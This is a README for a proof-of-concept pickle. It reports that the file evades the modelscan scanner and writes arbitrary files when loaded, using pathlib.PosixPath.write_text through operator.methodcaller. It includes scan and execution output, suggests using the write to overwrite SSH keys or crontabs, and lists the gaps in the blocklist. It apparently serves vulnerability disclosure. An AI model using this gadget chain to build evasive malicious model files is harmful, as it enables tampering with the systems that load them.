manja316's picture
Add README with bypass details
e827e1e verified
# Modelscan Bypass PoC β€” pathlib.PosixPath.write_text
## Summary
This pickle file bypasses ProtectAI's modelscan scanner and achieves **arbitrary file write** when loaded with `pickle.load()` or `torch.load()`.
## Technique
Uses `pathlib.PosixPath` combined with `operator.methodcaller("write_text", ...)` to write arbitrary content to any file path. Neither `pathlib` nor `operator.methodcaller` appear in modelscan's `unsafe_globals` blocklist.
**Chain:** `operator.methodcaller("write_text", "<content>")` β†’ `pathlib.PosixPath("<target_path>")`
## Scan Result
```
$ modelscan scan -p model.pkl
No issues found! πŸŽ‰
```
## Execution Result
```
$ python3 -c "import pickle; pickle.load(open('model.pkl','rb'))"
$ cat /tmp/pwned_pathlib.txt
PWNED_VIA_PATHLIB
```
## Impact
Arbitrary file write β€” can overwrite config files, crontabs, SSH authorized_keys, or drop webshells. Combined with `pathlib.PosixPath.read_text` (via a second methodcaller), also enables arbitrary file read.
## Blocklist Gaps
1. `pathlib` module β€” entirely missing from `unsafe_globals`
2. `operator.methodcaller` β€” not blocked (only `operator.attrgetter` is listed)